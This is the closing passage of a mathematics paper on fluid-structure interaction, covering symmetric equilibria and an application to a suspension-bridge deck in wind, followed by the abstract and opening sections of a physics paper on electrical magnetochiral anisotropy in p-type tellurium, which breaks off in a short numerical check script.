u+u\cdot\nabla u+\nabla p=0,\qquad\nabla\cdot u= 0\quad\text{in}\quad\Omega_{h}\\ u_{|_{\partial B_{h}}}=0,\quad u_{|_{\Gamma_{b}}}=u_{|_{\Gamma_{t}}}=\lambda Ue _{1},\quad u_{|_{\Gamma_{l}}}=\lambda V_{\text{in}}(x_{2})e_{1},\quad u_{|_{ \Gamma_{r}}}=\lambda V_{\text{out}}(x_{2})e_{1},\\ f(h)=-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(u,p)n,\end{array} \tag{6.1}\] with \(\lambda\geq 0\), \(U\in\{0,1\}\) (up to normalization). Here, \(V_{\text{in}},V_{\text{out}}\in W^{2,\infty}(-H,H)\) are now even functions satisfying \[V_{\text{in}}(\pm H)=V_{\text{out}}(\pm H)=U,\qquad\int_{-H}^{H}V_{\text{in}} (x_{2})dx_{2}=\int_{-H}^{H}V_{\text{out}}(x_{2})dx_{2}. \tag{6.2}\] In this symmetric framework, \(\delta_{b}=\delta_{t}=\delta\) and \(h\in(-H+\delta,H-\delta).\) Then, we prove that the unique curve \(\mathfrak{h}(\lambda)\) found in Theorem 3.1 reduces to \(\mathfrak{h}(\lambda)\equiv 0\). **Theorem 6.1**.: _Let \(V_{\text{in}}\), \(V_{\text{out}}\in W^{2,\infty}(-H,H)\) be even functions satisfying (6.2) and \(f\in C^{0}(-H+\delta,H-\delta)\) satisfying \(f(0)=0\) and (3.2)-(3.3) with \(\delta_{b}=\delta_{t}=\delta\). There exists \(\Lambda_{1}\in(0,\Lambda]\) such that for \(\lambda\in[0,\Lambda_{1})\) the FSI problem (6.1) admits a unique strong solution \((u(\lambda,h),p(\lambda,h),h)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h}) \times(-H+\delta,H-\delta)\) given by_ \[\big{(}u^{0}(\lambda,0),p^{0}(\lambda,0),0\big{)},\] _where \((u^{0}(\lambda,0),p^{0}(\lambda,0))\) is the unique solution to the first two lines in (6.1) for \(h=0\) and has the following symmetries:_ \[u^{0}_{1}(x_{1},-x_{2})=u^{0}_{1}(x_{1},x_{2}),\quad u^{0}_{2}(x_{1},-x_{2})=- u^{0}_{2}(x_{1},x_{2}),\quad p^{0}(x_{1},-x_{2})=p^{0}(x_{1},x_{2}).\] Proof.: The first step is to obtain the counterpart of Theorem 2.2. The case \(U=0\) is already included in the original statement. When \(U=1\), we construct the cut-off functions \(\zeta_{l}\) and \(\zeta_{r}\) in a slightly different way with Figure 3 replaced by Figure 5. We define the solenoidal extension as in (2.24), which satisfies the boundary conditions in (6.1). 
With this construction the refined bound (2.7) is replaced by \[\|u\|_{H^{1}(\Omega_{h})}\leq C((\varepsilon_{b}(h))^{-3/2}+(\varepsilon_{t}(h))^{-3/2})\lambda.\] Hence, in both cases \(U\in\{0,1\}\), by arguing as in the proof of Theorem 2.2, we infer that there exists \(\Lambda>0\) such that for \(\lambda\in[0,\Lambda)\) the solution \((u,p)\) to \[\begin{array}{c}-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\qquad\nabla\cdot u=0\quad\text{in}\quad\Omega_{h}\\ u_{|_{\partial B_{h}}}=0,\quad u_{|_{\Gamma_{b}}}=u_{|_{\Gamma_{t}}}=\lambda Ue_{1},\quad u_{|_{\Gamma_{l}}}=\lambda V_{\text{in}}(x_{2})e_{1},\quad u_{|_{\Gamma_{r}}}=\lambda V_{\text{out}}(x_{2})e_{1},\end{array} \tag{6.3}\] is unique for any \(h\in(-H+\delta,H-\delta)\). This proves the counterpart of Theorem 2.2. In particular, for \(h=0\) there exists a unique solution \((u^{0},p^{0})\) to (6.3) in \(\Omega_{0}\). Since \(\Omega_{0}\) is symmetric with respect to the line \(x_{2}=0\), the couple \((u^{*},p^{*}):\Omega_{0}\to\mathbb{R}^{2}\times\mathbb{R}\) defined by \[u_{1}^{*}(x_{1},x_{2})=u_{1}^{0}(x_{1},-x_{2}),\quad u_{2}^{*}(x_{1},x_{2})=-u_{2}^{0}(x_{1},-x_{2}),\quad p^{*}(x_{1},x_{2})=p^{0}(x_{1},-x_{2}),\] also satisfies (6.3) for \(h=0\) (see also [9]). Therefore, by uniqueness \((u^{0},p^{0})=(u^{*},p^{*})\) is also symmetric and, thanks to all these symmetries, we obtain \[L(\lambda,0)=-e_{2}\cdot\int_{\partial B_{0}}\mathbb{T}(u^{0}(\lambda,0),p^{0}(\lambda,0))n=0,\] which implies \[\phi(\lambda,0)=f(0)=0\qquad\text{for}\quad\lambda\in[0,\Lambda). \tag{6.4}\] From Theorem 3.1 we know that there exist \(\Lambda_{1}\in(0,\Lambda]\) and a unique curve \(\mathfrak{h}\in C^{0}[0,\Lambda_{1})\) such that for \(\lambda\in[0,\Lambda_{1})\) the unique solution to (6.1) is given by \((u(\lambda,\mathfrak{h}(\lambda)),p(\lambda,\mathfrak{h}(\lambda)),\mathfrak{h}(\lambda))\). By (6.4), \(\mathfrak{h}(\lambda)\equiv 0\) and the unique solution to (6.1) is \((u^{0}(\lambda,0),p^{0}(\lambda,0),0)\).

Figure 5. The cut-off functions \(\zeta_{l}\) (left) and \(\zeta_{r}\) (right) on \(\overline{R}\) when \(U=1\) for the symmetric configuration.

## 7. An application: equilibrium positions of the deck of a bridge A suspension bridge is usually erected starting from the anchorages and the towers. Then the sustaining cables are installed between the two pairs of towers and the hangers are hooked to the cables. Once all these components are in position, they furnish a stable working base from which the deck can be raised from floating barges. We refer to [16, Section 15.23] for full details. The deck segments are put in position one beside the other (see Figure 6, left) and have the shape of rectangles while their cross-section resembles smoothened irregular hexagons (see Figure 6, right) that satisfy (2.1). This cross-section \(B\) plays the role of the obstacle in (2.4) while \(\Omega_{h}\) is the region filled by the air. This region can either be a virtual box around the deck of the bridge or a wind tunnel around a scaled model of the bridge. In both cases, we may refer to inflow and outflow also as windward and leeward respectively: \(\lambda V_{\text{in}}e_{1}\) represents the laminar horizontal windward while \(\lambda V_{\text{out}}e_{1}\) is the leeward. Typically, the higher the altitude, the stronger the wind. Therefore, in this application we consider specific laminar shear flows, which are the Couette flows.
Thus, the inflow and outflow now read \[V_{\rm in}(x_{2})=V_{\rm out}(x_{2})=\frac{U}{2H}(x_{2}+H)\qquad\text{for}\qquad x_{2}\in[-H,H], \tag{7.1}\] and satisfy (2.3). The windward creates both vertical and torsional displacements of the deck. However, the cross-section of the suspension bridge is also subject to some elastic restoring forces tending to maintain the deck in its original position \(B_{0}\). These forces are of three different kinds. There is an upwards restoring force due to the elastic action of both the hangers and the sustaining cables of the bridge. The hangers behave as nonlinear springs which may slacken [1, 9-VI] so that they have no downwards action and may be nonsmooth. There is the weight of the deck which acts constantly downwards: this is why there is no odd requirement on the restoring force considered in the model. There is also a nonlinear resistance to both elastic bending and stretching of the whole deck for which \(B\) merely represents a cross-section. Moreover, since the boundary of the channel \(R\) is virtual and our physical model breaks down in case of collision of \(B\) with \(\partial R\), we require that there exists an "unbounded force" preventing collisions. Overall, the position of \(B\) depends on both the displacement parameter \(h\) and the angle of rotation \(\theta\) with respect to the horizontal axis. With the addition of this second degree of freedom, we have \(B=B_{h,\theta}\) and \(\Omega=\Omega_{h,\theta}\). A "plastic" regime leading to the collapse of the bridge is reached when \(\theta=\pm\frac{\pi}{4}\) (see [1]) since the sustaining cables of the bridge attain their maximum elastic tension. The strong point of the analysis carried out in this paper is that it applies independently of the part of \(\partial B\) closest to \(\partial R\). Therefore, for any \(\theta\in(-\frac{\pi}{4},\frac{\pi}{4})\), we can apply our general theory considering the family of bodies \(B_{h,\theta}\) simply by adapting it to the rotating scenario. The only difference now is that, when the body is free to rotate, the collision with \(\Gamma_{b}\) and \(\Gamma_{t}\) occurs at \(h=-H+\delta_{b}(\theta)\) and \(h=H-\delta_{t}(\theta)\), where \(\delta_{b}(\theta)\) and \(\delta_{t}(\theta)\) are positive functions of \(\theta\). For \(\theta=0\), \(\delta_{b}(0)\) and \(\delta_{t}(0)\) are as in (2.2) while, for \(\theta\neq 0\), \[\delta_{b}(\theta):=-\min_{(x_{1},x_{2})\in\partial B_{h,\theta}}x_{2}>0,\qquad\delta_{t}(\theta):=\max_{(x_{1},x_{2})\in\partial B_{h,\theta}}x_{2}>0,\] both being independent of \(h\). Due to the possibly complicated shape of \(B\), these functions are not easy to determine explicitly.

Figure 6. Left: section of a suspension bridge. Right: sketch of a cross-section.

For this reason, we define the set of non-contact values of \((h,\theta)\) by \[A=\{(h,\theta)\in(-H,H)\times(-\tfrac{\pi}{4},\tfrac{\pi}{4})\ :\ B_{h,\theta}\subset R\}. \tag{7.2}\] Clearly, \((0,0)\in A\) and \((h,\theta)\in\partial A\) if and only if \(B_{h,\theta}\cap\partial R\neq\emptyset.\) We assume that, for some \(K>0\), \(f\in C^{0}(A)\) satisfies \[\begin{split}&\limsup_{d(B_{h,\theta},\Gamma_{b})\to 0}\ f(h,\theta)(d(B_{h,\theta},\Gamma_{b}))^{3/2}\leq-K,\\ &\liminf_{d(B_{h,\theta},\Gamma_{t})\to 0}\ \frac{f(h,\theta)}{\max\{(d(B_{h,\theta},\Gamma_{t}))^{-3/2},U(d(B_{h,\theta},\Gamma_{t}))^{-3}\}}\geq K,\end{split} \tag{7.3}\] where \(d(\cdot,\cdot)\) is the distance function.
Assumption (7.3) generalizes (3.3) taking into account the rotational degree of freedom. Moreover, we assume that \[\begin{split}&\exists\gamma>0\quad\text{s.t.}\quad\frac{f(h_{1},\theta)-f(h_{2},\theta)}{h_{1}-h_{2}}\geq\gamma\qquad\forall(h_{1},\theta),(h_{2},\theta)\in A,\\ & f(0,0)=0,\qquad f(h,\theta)\theta>0\quad\forall(h,\theta)\in A\quad\text{with}\quad\theta\neq 0.\end{split} \tag{7.4}\] In fact, the second line in (7.4) is not mathematically needed but, from a physical point of view, it states that the restoring force does not act at equilibrium and tends to maintain \(B\) in a horizontal position. A straightforward consequence of Theorem 3.1, in the case of the interaction between the wind and the deck of a suspension bridge, is the following: **Corollary 7.1**.: _Let \(V_{\mathrm{in}}\), \(V_{\mathrm{out}}\) be as in (7.1) and \(f\in C^{0}(A)\) satisfy (7.3)-(7.4). There exist \(\Lambda_{1}\in(0,\Lambda]\) and a unique \(\mathfrak{h}\in C^{0}[0,\Lambda_{1})\) such that, for \(\lambda\in[0,\Lambda_{1})\) and \(\theta\in(-\tfrac{\pi}{4},\tfrac{\pi}{4})\), the FSI problem (3.4) admits a unique solution \((u_{\theta}(\lambda,h),p_{\theta}(\lambda,h),h)\in H^{2}(\Omega_{h,\theta})\times H^{1}(\Omega_{h,\theta})\times(-H,H)\), with \((h,\theta)\in A\), given by_ \[(u_{\theta}(\lambda,\mathfrak{h}(\lambda)),p_{\theta}(\lambda,\mathfrak{h}(\lambda)),\mathfrak{h}(\lambda)).\] _Here, (3.4) is understood with \(h\) replaced by the couple \((h,\theta)\)._ The deck of a suspension bridge, in particular its cross-section, may have a nonsmooth boundary. If \(B\) is not \(W^{2,\infty}\) but only Lipschitzian, Theorem 2.2 ceases to hold and we only know that \((u,p)\) is a weak solution to (2.4) so that (3.1) does not hold in a "strong" sense. Indeed, since \(u\in H^{1}(\Omega_{h})\), see (2.7), we may rewrite the first equation in (2.4) as \(-\mu\Delta u+\nabla p=f\) with \(f\in L^{q}(\Omega_{h})\) for all \(q<2\). Hence, \(f\in H^{-\epsilon}(\Omega_{h})\) for any \(\epsilon>0\). By applying [17, Theorem 7] we then deduce that \(u\in H^{1+s}(\Omega_{h})\) and \(p\in H^{s}(\Omega_{h})\) for all \(s<1/2\) but, still, this does not allow one to consider the trace of \(\mathbb{T}(u,p)\) as an integrable function over \(\partial B_{h}\). However, following [9] we may define the lift \(L\) through a generalized formula. Indeed, from \(u\in H^{1}(\Omega_{h})\) we know that \(\mathbb{T}(u,p)\in L^{2}(\Omega_{h})\) and, since \(\Omega_{h}\) is a bounded domain, \(\mathbb{T}(u,p)\in L^{3/2}(\Omega_{h})\). Moreover, from the first equation in (2.4) we obtain \(\nabla\cdot\mathbb{T}(u,p)\in L^{3/2}(\Omega_{h})\). Therefore \(\mathbb{T}(u,p)\in E_{3/2}(\Omega_{h}):=\{f\in L^{3/2}(\Omega_{h})\ |\ \nabla\cdot f\in L^{3/2}(\Omega_{h})\}\). By Theorem III.2.2 in [4] we know that \(\mathbb{T}(u,p)n_{|_{\partial\Omega_{h}}}\in W^{-2/3,3/2}(\partial\Omega_{h})\). Hence, if \(\partial B_{h}\) is Lipschitzian and \((u,p)\) is a weak solution to (2.4), then the lift exerted by the fluid over \(B_{h}\) is \[L(\lambda,h)=-e_{2}\cdot\langle\mathbb{T}(u,p)n,1\rangle_{\partial B_{h}}, \tag{7.5}\] where \(\langle\cdot,\cdot\rangle_{\partial B_{h}}\) denotes the duality pairing between \(W^{-2/3,3/2}(\partial B_{h})\) and \(W^{2/3,3}(\partial B_{h})\).
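For the reader's convenience, we also recall the identity behind the definition (7.5); the following is only a sketch, based on the normal-trace theory of [4, Theorem III.2.2]: for fields in \(E_{3/2}(\Omega_{h})\) the normal trace is characterized by the generalized Gauss formula
\[\langle\mathbb{T}(u,p)n,\varphi\rangle_{\partial\Omega_{h}}=\int_{\Omega_{h}}\mathbb{T}(u,p):\nabla\varphi+\int_{\Omega_{h}}\big{(}\nabla\cdot\mathbb{T}(u,p)\big{)}\cdot\varphi\qquad\forall\varphi\in W^{1,3}(\Omega_{h})\:.\]
Choosing \(\varphi\) equal to \(e_{2}\) near \(\partial B_{h}\) and vanishing near \(\partial R\) (for instance, the field \(w\) constructed in Section 4), the right-hand side yields a volume-integral expression for (7.5), in analogy with (4.2).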
### Acknowledgments The authors were partially supported by the PRIN project _Direct and inverse problems for partial differential equations: theoretical aspects and applications_ and by the Gruppo Nazionale per l'Analisi Matematica, la Probabilità e le loro Applicazioni (GNAMPA) of the Istituto Nazionale di Alta Matematica (INdAM). **Data availability statement.** Data sharing not applicable to this article as no datasets were generated or analysed during the current study. There are no conflicts of interest.
2308.10358
Electrical Magnetochiral current in Tellurium
We have studied theoretically the effect of Electrical Magneto-Chiral Anisotropy (eMChA) in $p$-type tellurium crystals. It is shown that the terms $k_i B_j$ in the hole Hamiltonian, linear both in the wave vector ${\mathbf k}$ and the magnetic field ${\mathbf B}$, do not lead to the eMChA and one needs to include the higher-order terms like $k_i^3 B_j$. Two microscopic mechanisms of the effect are considered. In the first one, only elastic scattering of holes by impurities or imperfections is taken into consideration. In the second mechanism, besides the elastic scattering processes, the hole gas heating and its energy relaxation are taken into account. It is demonstrated that both contributions to the magneto-induced rectification are comparable in magnitude. The calculation is performed by using two independent approaches, namely, in the time relaxation approximation and in the limit of small chiral band parameter $\beta$. A connection is also established between the eMChA and magneto-induced photogalvanic effects.
L. E. Golub, E. L. Ivchenko, B. Spivak
2023-08-20T20:17:03Z
http://arxiv.org/abs/2308.10358v1
# Electrical Magnetochiral current in Tellurium ###### Abstract We have studied theoretically the effect of Electrical Magneto-Chiral Anisotropy (eMChA) in \(p\)-type tellurium crystals. It is shown that the terms \(k_{i}B_{j}\) in the hole Hamiltonian, linear both in the wave vector \(\mathbf{k}\) and the magnetic field \(\mathbf{B}\), do not lead to the eMChA and one needs to include the higher-order terms like \(k_{i}^{3}B_{j}\). Two microscopic mechanisms of the effect are considered. In the first one, only elastic scattering of holes by impurities or imperfections is taken into consideration. In the second mechanism, besides the elastic scattering processes, the hole gas heating and its energy relaxation are taken into account. It is demonstrated that both contributions to the magneto-induced rectification are comparable in magnitude. The calculation is performed by using two independent approaches, namely, in the time relaxation approximation and in the limit of small chiral band parameter \(\beta\). A connection is also established between the eMChA and magneto-induced photogalvanic effects. ## I Introduction Tellurium is an elemental chiral crystal with a D\({}_{3}\) point symmetry. It has natural optical activity [1; 2], and it is tellurium where the Circular Photogalvanic effect [3; 4], electric-current induced optical activity [5; 6] and bulk Circular Photon Drag effect [7] were discovered; Sakano et al. have verified experimentally, for the first time, the spin texture of the right- and left-handed tellurium by the ARPES and SARPES measurements [8]. Recently, Rikken and Avarvari observed the effect of Electrical Magneto-Chiral Anisotropy (eMChA) in Te crystals [9]. This effect manifests itself as an additional contribution to the sample resistance \(R=R_{0}(1+\gamma BI)\), where \(R_{0}\) is a constant, \(B\) is the magnetic field strength, \(I\) is the electric current, and the coefficient of bilinear magneto-electric resistance \(\gamma\) describes a rectification by the sample, see Refs. [10; 11] for reviews. Earlier, the effect of chirality (or non-reciprocity) in magnetotransport has been observed in a number of other gyrotropic materials: distorted bismuth wires [12], carbon nanotubes [13; 14], crystals of chiral salt (DM-EDT-TTF)\({}_{2}\)ClO\({}_{4}\)[15], polar semiconductor crystal BiTeBr [16], topological insulators [17; 18; 19; 20; 21], semimetals ZrTe\({}_{5}\)[22], WTe\({}_{2}\)[23] and \(\alpha\)-Sn [24], and on the surface of SrTiO\({}_{3}\)(111) [25]. Theoretically, the eMChA effect has been considered for carbon nanotubes [26; 27], Weyl semimetals of TaAs type [28], semimetal ZrTe\({}_{5}\)[22] (Supplemental Material), surface states in topological insulators [29] and molecular conductors [30]. In the works [22; 29], a calculation of the correction to the electric current \(\delta j\propto E^{2}B\), proportional to the squared electric field strength \(E\) and linear in the magnetic field \(B\), has been performed in the simplest approximation of a general relaxation time (\(\tau\)-approximation). This approach does not take into account a difference between quasimomentum and energy relaxations, or between elastic and inelastic relaxation processes of free charge carriers. In this paper we show that, once this difference is taken into account, there are two independent microscopic mechanisms of eMChA.
In a simplified form, the presence of two mechanisms can be explained as follows: Let us divide a correction to the charge carrier distribution function \(\delta f_{\mathbf{k}}\propto E^{2}\) into two terms, \(\delta f(\varepsilon_{\mathbf{k}})\) and \(\delta f_{\mathbf{k}}^{\text{ss}}\), where the first function depends on the carrier energy \(\varepsilon_{\mathbf{k}}\) (\(\mathbf{k}\) is a wavevector), and the second function, \(\delta f_{\mathbf{k}}^{\text{ss}}\), is an asymmetric correction with zero average over the directions of the wavevector \(\mathbf{k}\) at constant energy. The correction \(\delta f_{\mathbf{k}}^{\text{ss}}\) is controlled by the momentum relaxation time \(\tau_{p}\), while in order to calculate \(\delta f(\varepsilon_{\mathbf{k}})\) one must account for inelastic processes of carrier-phonon interaction and, hence, introduce the energy relaxation time \(\tau_{\varepsilon}\) which can be much longer than \(\tau_{p}\). As noticed in Ref. [26], although the correction \(\delta f(\varepsilon_{\mathbf{k}})\propto\tau_{\varepsilon}\) by itself does not result in the electric current, its relaxation through interaction with phonons produces an asymmetric distribution of carriers in the \(\mathbf{k}\) space with an extra multiplier \(\tau_{p}/\tau_{\varepsilon}\). As a result, the mechanisms related to \(\delta f_{\mathbf{k}}^{\text{ss}}\) and \(\delta f(\varepsilon_{\mathbf{k}})\) lead to comparable contributions to the electrical magneto-chiral current \(\delta j\propto\tau_{p}^{2}E^{2}B\). Here we consider both mechanisms resulting in eMChA of holes in the Te valence band. The paper is organized as follows. In Sec. II, macroscopic equations are presented. A general consideration of the eMChA effect in Te is given in Sec. III. In Sec. IV, the eMChA current is estimated in the relaxation-time approximation. Sections V and VII are devoted to rigorous calculations of the contributions caused by the elastic and inelastic relaxation processes, respectively. The perturbative results in the lowest order in the chirality parameter are presented in Sec. VI. In Sec. VIII, a discussion of the results is given, and Sec. IX summarizes the paper. ## II Macroscopic equations The phenomenon under study is described by a fourth-rank tensor in the expansion of the electric current density in powers of the electric field strength \(\mathbf{E}\) and magnetic field \(\mathbf{B}\) \[j_{i}=\sigma_{ij}E_{j}+\sigma^{(H)}_{ijk}E_{j}B_{k}+G_{ijkl}E_{j}E_{k}B_{l}\:. \tag{1}\] The first two terms are allowed by any point symmetry: \(\mathbf{\sigma}\) is the tensor of linear conductivity and \(\sigma^{(H)}_{ijk}\) is the Hall conductivity tensor. The eMChA effect is represented by the magnetochiral tensor \(\mathbf{G}\), symmetric in the indices \(j\) and \(k\). It is related by \[G_{ijkl}\propto\gamma_{ij^{\prime}k^{\prime}l}\sigma_{j^{\prime}j}\sigma_{k^{\prime}k}\] to the tensor \(\mathbf{\gamma}\) which is introduced in Eq. (1) of Ref. [9] and describes the second-harmonic generation \[E^{2\omega}_{i}=\gamma_{ijkl}j^{\omega}_{j}j^{\omega}_{k}B_{l}\:,\] under conditions where the modulation period \(T=2\pi/\omega\) exceeds by far all the microscopic times of the system. In crystals of D\({}_{3}\) symmetry there are ten linearly-independent components of the \(G_{ijkl}\) tensor with indices \(zzzz\), \(xxxx\), \(zzxx\), \(xxzz\), \(xzxz\), \(xyyx\), \(zxxy\), \(zxxy\) and \(xzxy\)[31]. Note that, in this point group, the component \(G_{xxyy}\) equals \((G_{xxxx}-G_{xyyx})/2\). In Ref.
[9], the following estimates are given: \(12G_{zzzz}\approx G_{xxxy}\approx 3G_{xxxx}\), and the inequality \(G_{zzzz}\ll G_{zzzz}\) is presented. This contradicts the point symmetry D\({}_{3}\) where the nonzero components \(G_{zzzz}\) and \(G_{xxxy}\) are forbidden. In our work the attention is focused on the components \(G_{zzzz}\) and \(G_{xxxx}\) allowed by the symmetry, i.e., on the geometries \(\mathbf{j}\parallel\mathbf{E}\parallel\mathbf{B}\parallel z\) (the \(z\)-eMChA geometry for short) and \(\mathbf{j}\parallel\mathbf{E}\parallel\mathbf{B}\parallel x\) (\(x\)-eMChA). In these cases the Hall effect does not appear and hence is not discussed here. We use the notation \(\delta\mathbf{j}\) for the electric magnetochiral (eMCh) current, or the third term in Eq. (1). The paper is devoted to the consideration of this particular current. With account for the symmetry, the macroscopic relation between the correction to the current \(\delta\mathbf{j}\) and the electric and magnetic vectors can be written in the following convenient form \[\delta j_{z} = G^{(1)}E_{z}^{2}B_{z}+G^{(2)}(E_{x}^{2}+E_{y}^{2})B_{z}+G^{(3)}[(E_{x}^{2}-E_{y}^{2})B_{y}+2E_{x}E_{y}B_{x}]+G^{(4)}E_{z}(E_{x}B_{x}+E_{y}B_{y})\:, \tag{2}\] \[\delta j_{x} = G^{(5)}(E_{x}^{2}+E_{y}^{2})B_{x}+G^{(6)}E_{z}^{2}B_{x}+G^{(7)}[(E_{x}^{2}-E_{y}^{2})B_{x}+2E_{x}E_{y}B_{y}]+G^{(8)}2E_{x}E_{y}B_{z}\] \[+\ G^{(9)}E_{x}E_{z}B_{z}+G^{(10)}E_{z}(E_{x}B_{y}+E_{y}B_{x})\:,\] \[\delta j_{y} = G^{(5)}(E_{x}^{2}+E_{y}^{2})B_{y}+G^{(6)}E_{z}^{2}B_{y}+G^{(7)}[-(E_{x}^{2}-E_{y}^{2})B_{y}+2E_{x}E_{y}B_{x}]+G^{(8)}(E_{x}^{2}-E_{y}^{2})B_{z}\] \[+\ G^{(9)}E_{y}E_{z}B_{z}+G^{(10)}E_{z}(E_{x}B_{x}-E_{y}B_{y})\:,\] where \(G^{(n)}\) (\(n=1\ldots 10\)) are macroscopic parameters. The material relation between \(\delta j_{x}\), \(\delta j_{y}\) and the transverse components of vectors \(\mathbf{E}\) and \(\mathbf{B}\) has an axial symmetry and preserves its form at any orientation of the \(x,y\) axes relative to the second-order symmetry axes C\({}_{2}\). ## III General consideration The current \(\delta j_{z}\propto G_{zzzz}\) is induced in the magnetic field \(\mathbf{B}\parallel z\). In the presence of this field, the effective 2\(\times\)2 valence-band Hamiltonian in Te has the following form [32; 33; 4] \[\mathcal{H}=\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{\perp}^{2}+(\beta k_{z}+gB_{z})\sigma_{z}+\Delta_{2}\sigma_{x}\:. \tag{3}\] Here \(\mathbf{k}\) is a wavevector, \(k_{\perp}^{2}=k_{x}^{2}+k_{y}^{2}\), \(\sigma_{x}\) and \(\sigma_{z}\) are the pseudospin Pauli matrices in the basis \(\pm 3/2\) (the reducible representation \(\mathcal{D}=H_{4}+H_{5}\)), \(\Delta_{2}\) is the spin-orbit half-splitting of the valence-band states \[(|3/2\rangle\pm|-3/2\rangle)/\sqrt{2}\] at the \(H\) point of the Brillouin zone, the parameter \(g\) describes the Zeeman effect, the parameters \(\mathcal{A}_{1},\mathcal{A}_{2}\) are responsible for parabolic scalar terms, and the coefficient \(\beta\) determines the strength of the \(k_{z}\)-linear term; it has opposite signs in the two Te enantiomers D\({}_{3}^{4}\) and D\({}_{3}^{6}\) (or P3\({}_{1}\)21 and P3\({}_{2}\)21). Hereafter we use the hole representation and take \(\mathcal{A}_{1,2}>0\). We study magnetoelectric transport of holes occupying the lowest valence band of Te (uppermost in the electron representation). According to Eq. (3) its energy dispersion relation is given by \[\varepsilon_{\mathbf{k}}=\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{\perp}^{2}-\sqrt{\Delta_{2}^{2}+(\beta k_{z}+gB_{z})^{2}}+\Delta_{2}.
\tag{4}\] Since we are interested in linear-\(\mathbf{B}\) effects, we make an expansion \(\varepsilon_{\mathbf{k}}\approx\varepsilon_{\mathbf{k}}^{0}+\delta\varepsilon_{\mathbf{k}}\), where the zero-field energy is \[\varepsilon_{\mathbf{k}}^{0}=\mathcal{A}_{1}k_{z}^{2}+\mathcal{A}_{2}k_{\perp}^{2}-\sqrt{\Delta_{2}^{2}+\beta^{2}k_{z}^{2}}+\Delta_{2}\:, \tag{5}\] and the correction \[\delta\varepsilon_{\mathbf{k}}=-gB_{z}\eta(k_{z}),\qquad\eta=\frac{\beta k_{z}}{\sqrt{\Delta_{2}^{2}+\beta^{2}k_{z}^{2}}}\:. \tag{6}\] The hole energy dispersion at zero magnetic field and at \(B_{z}\neq 0\) is illustrated in Fig. 1.

Figure 1: The lowest valence subband of tellurium in the hole representation in the vicinity of the \(H\) point. The curves show the hole energy dispersion \(\varepsilon_{\mathbf{k}}\) vs. \(k_{z}\) at \(k_{\perp}=0\) in the absence (dashed) and presence (solid) of the magnetic field \(\mathbf{B}\parallel z\).

At \(B_{z}=0\) the eigenvectors of the Hamiltonian (3) are two-component columns \[u^{0}_{k_{z}}=\frac{1}{\sqrt{2}}\left[\begin{array}{c}\sqrt{1+\eta(k_{z})}\\ \sqrt{1-\eta(k_{z})}\end{array}\right]\,. \tag{7}\] The dispersion \(\varepsilon^{0}_{\mathbf{k}}\) has the camel's back shape with the energy minimum \(\varepsilon_{m}=-\Delta^{2}\mathcal{A}_{1}/\beta^{2}\). At fixed hole energy \(\varepsilon^{0}_{\mathbf{k}}=\varepsilon\geq\varepsilon_{m}\) the values of \(k_{\perp}\) lie in the range between \(0\) and \(\sqrt{(\varepsilon-\varepsilon_{m})/\mathcal{A}_{2}}\) while the values of \(k_{z}\) fill the range \(K_{z}(\varepsilon)\) containing two intervals \([-\kappa(\varepsilon),-\kappa^{\prime}(\varepsilon)]\) and \([\kappa^{\prime}(\varepsilon),\kappa(\varepsilon)]\), where \[\kappa(\varepsilon) =\sqrt{\frac{\varepsilon-\Delta+\sqrt{\Delta^{2}+\beta^{2}\varepsilon/\mathcal{A}_{1}}}{\mathcal{A}_{1}}}\,, \tag{8}\] \[\kappa^{\prime}(\varepsilon) =\sqrt{\frac{\varepsilon-\Delta-\sqrt{\Delta^{2}+\beta^{2}\varepsilon/\mathcal{A}_{1}}}{\mathcal{A}_{1}}}\,,\] and \(\Delta=\Delta_{2}-\beta^{2}/(2\mathcal{A}_{1})\). For \(\varepsilon>0\), the value of \(\kappa^{\prime}\) should be set to \(0\) and the range \(K_{z}(\varepsilon)=[-\kappa(\varepsilon),\kappa(\varepsilon)]\). For calculation of the \(G_{xxxx}\) component one should add to the Hamiltonian (3) scalar terms linear in \(B_{x}\) and odd in \(k_{x}\), see the next section. The eMCh current density is calculated in the standard way with the help of the hole distribution function \(f_{\mathbf{k}}\) as follows \[\delta\mathbf{j}=2e\sum_{\mathbf{k}}\mathbf{v}(\mathbf{k})f_{\mathbf{k}}\,, \tag{9}\] where \(e>0\) is the elementary charge, the factor \(2\) accounts for the two valleys \(H\) and \(H^{\prime}\), and \(\mathbf{v}(\mathbf{k})\) is the hole velocity \(\hbar^{-1}\partial\varepsilon_{\mathbf{k}}/\partial\mathbf{k}\). In the \(z\)-eMChA geometry, the distribution function \(f_{\mathbf{k}}\) is dependent on \(k_{z}\) and \(k_{\perp}^{2}\) and independent of the azimuth angle between \(\mathbf{k}_{\perp}\) and the \(x\) axis. It is helpful to change variables from \((k_{z},k_{\perp}^{2})\) to \((k_{z},\varepsilon^{0}_{\mathbf{k}})\) bearing in mind that \[k_{\perp}^{2}=\frac{1}{\mathcal{A}_{2}}\bigg{(}\varepsilon^{0}_{\mathbf{k}}+\sqrt{\Delta_{2}^{2}+\beta^{2}k_{z}^{2}}-\Delta_{2}\bigg{)}\,.\] Thus, all functions of \(k_{z}\) and \(k_{\perp}^{2}\) are treated as dependent on \(k_{z}\) and energy \(\varepsilon^{0}_{\mathbf{k}}\), \(\mathcal{F}(k_{z},\varepsilon^{0}_{\mathbf{k}})\).
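As a quick numerical sanity check of the geometry just described, the short script below verifies that \(\kappa(\varepsilon)\) in Eq. (8) inverts the zero-field dispersion (5) at \(k_{\perp}=0\) and that the camel's-back minimum equals \(\varepsilon_{m}=-\Delta^{2}\mathcal{A}_{1}/\beta^{2}\). The helper names and parameter values are ours and purely illustrative; they are not the actual Te band parameters.

```python
import numpy as np

# Illustrative parameters (arbitrary units); they satisfy beta^2 > 2*A1*Delta2,
# so the camel's-back minimum of the dispersion lies at k_z != 0.
A1, A2, Delta2, beta = 1.0, 1.0, 0.5, 1.2
Delta = Delta2 - beta**2 / (2.0 * A1)

def eps0(kz, kperp2=0.0):
    """Zero-field hole dispersion, Eq. (5)."""
    return A1 * kz**2 + A2 * kperp2 - np.sqrt(Delta2**2 + beta**2 * kz**2) + Delta2

def kappa(eps):
    """Outer k_z solution of eps0(k_z, k_perp = 0) = eps, Eq. (8)."""
    return np.sqrt((eps - Delta + np.sqrt(Delta**2 + beta**2 * eps / A1)) / A1)

# kappa(eps) inverts the dispersion at k_perp = 0 ...
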